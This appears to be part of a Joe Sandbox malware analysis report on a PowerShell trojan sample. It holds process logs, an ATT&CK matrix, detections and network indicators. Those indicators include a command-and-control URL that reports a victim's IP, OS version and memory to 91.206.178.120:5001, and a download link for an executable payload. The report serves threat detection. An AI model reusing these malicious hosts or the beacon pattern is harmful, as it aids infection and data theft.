Source: powershell.exe, 00000000.00000002.1821183287.00000000079BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1823460527.00000000089C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1823460527.00000000089A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\XkgoE6Yb52.ps1 VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
System Network Configuration Discovery		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync21
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
XkgoE6Yb52.ps116%VirustotalBrowse
XkgoE6Yb52.ps114%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://91.206.178.120:5001100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=$randomNumber100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=100%Avira URL Cloudmalware
https://goutteuy.com0%Avira URL Cloudsafe
https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exe100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=33884$Mnl100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_end?random_number=33884100%Avira URL Cloudmalware
https://goutteuy.com/wp-content/p100%Avira URL Cloudmalware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
goutteuy.com
185.211.7.193
truetrue
    		unknown
    maxcdn.bootstrapcdn.com
    		104.18.10.207
    		truefalse
      		high
      api.ipify.org
      		104.26.13.205
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssfalse
          		high
          http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884true
          • Avira URL Cloud: malware
          		unknown
          https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exetrue
          • Avira URL Cloud: malware
          		unknown
          http://api.ipify.org/false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:225:0powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmpfalse
                  		high
                  http://crl.microsoftpowershell.exe, 00000000.00000002.1821221013.0000000007A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://91.206.178.120:5001/script_end?random_number=$randomNumbernotepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1false
                      • Avira URL Cloud: malware
                      		unknown
                      https://go.micropowershell.exe, 00000000.00000002.1817520392.0000000005B55000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://maxcdn.bootstrapcdn.com/powershell.exe, 00000000.00000002.1822987917.00000000088E7000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://91.206.178.120:5001/script_end?random_number=powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://tagassistant.google.com/analytics[1].js.0.drfalse
                                		high
                                http://91.206.178.120:5001/script_end?random_number=33884$Mnlpowershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.csslpowershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://91.206.178.120:5001/script_start?ip=powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://ampcid.google.com/v1/publisher:getClientIdanalytics[1].js.0.drfalse
                                    		high
                                    http://91.206.178.120:5001powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://api.ipify.orgpowershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1false
                                        		high
                                        https://maxcdn.bootstrapcdn.com/lpowershell.exe, 00000000.00000002.1822729964.0000000008880000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://goutteuy.compowershell.exe, 00000000.00000002.1817520392.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$rapowershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://crl.micropowershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/ads/ga-audiencesanalytics[1].js.0.drfalse
                                              		high
                                              http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoftpowershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:225:0powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                		high
                                                https://goutteuy.com/wp-content/ppowershell.exe, 00000000.00000002.1817520392.0000000005708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://www.google.%/ads/ga-audiencesanalytics[1].js.0.drfalse
                                                  		high
                                                  http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mpowershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://aka.ms/pscore6lBdqpowershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css#powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://getbootstrap.com)bootstrap.min[1].css.0.drfalse
                                                            		high
                                                            https://github.com/twbs/bootstrap/blob/master/LICENSE)bootstrap.min[1].css.0.drfalse
                                                              		high
                                                              http://91.206.178.120:5001/script_end?random_number=33884powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://stats.g.doubleclick.net/j/collectanalytics[1].js.0.drfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssSpowershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.18.10.207
                                                                    		maxcdn.bootstrapcdn.comUnited States
                                                                    		13335CLOUDFLARENETUSfalse
                                                                    185.211.7.193
                                                                    		goutteuy.comGermany
                                                                    		46261QUICKPACKETUStrue
                                                                    91.206.178.120
                                                                    		unknownPoland
                                                                    		200088ARTNET2PLtrue
                                                                    104.26.13.205
                                                                    		api.ipify.orgUnited States
                                                                    		13335CLOUDFLARENETUSfalse

                                                                    General Information

                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1617748
                                                                    Start date and time:2025-02-18 08:28:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 4m 53s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:7
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:XkgoE6Yb52.ps1
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635.ps1
                                                                    Detection:MAL
                                                                    Classification:mal76.troj.winPS1@3/10@3/4
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 93%
                                                                    • Number of executed functions: 43
                                                                    • Number of non-executed functions: 13
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .ps1

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 142.250.185.106, 142.250.185.142, 20.12.23.50, 13.107.253.45
                                                                    • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fonts.googleapis.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, www.google-analytics.com
                                                                    • Execution Graph export aborted for target powershell.exe, PID 6808 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    02:29:01API Interceptor44x Sleep call for process: powershell.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.18.10.207http://desifoodcorner.wb4.xyz/Get hashmaliciousUnknownBrowse
                                                                    • maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.11632.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.10211.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.6905.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.32268.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.6905.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.4633.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.21631.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    SecuriteInfo.com.Exploit.Siggen3.17149.14541.xlsGet hashmaliciousUnknownBrowse
                                                                    • netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
                                                                    185.211.7.193Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      91.206.178.120oNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                      • 91.206.178.120:5001/script_end?random_number=91530
                                                                      Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 91.206.178.120:5001/script_end?random_number=66350
                                                                      104.26.13.205R1TftmQpuQ.batGet hashmaliciousTargeted RansomwareBrowse
                                                                      • api.ipify.org/
                                                                      SpacesVoid Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                                                      • api.ipify.org/
                                                                      lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                                                      • api.ipify.org/
                                                                      Simple1.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                      • api.ipify.org/
                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                      • api.ipify.org/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      goutteuy.comPmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 185.211.7.193
                                                                      api.ipify.orgoNvY66Z8jp.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      Pmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      SecuriteInfo.com.Win32.Evo-gen.5457.19170.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 104.26.12.205
                                                                      LmIclOjfqc.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.13.205
                                                                      http://account-5036237.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      http://account-5078804.kurhaus-steina.com/Get hashmaliciousUnknownBrowse
                                                                      • 104.26.13.205
                                                                      https://business.accounts-security-center-overview.com/caseGet hashmaliciousUnknownBrowse
                                                                      • 172.67.74.152
                                                                      https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                                                      • 172.67.74.152
                                                                      https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.orgGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.26.12.205
                                                                      DeepLauncher.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      maxcdn.bootstrapcdn.comPmw24ExIdx.ps1Get hashmaliciousUnknownBrowse
                                                                      • 104.18.11.207
                                                                      Jim.flanigan Open annual plan_Catalinamarketing.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.11.207
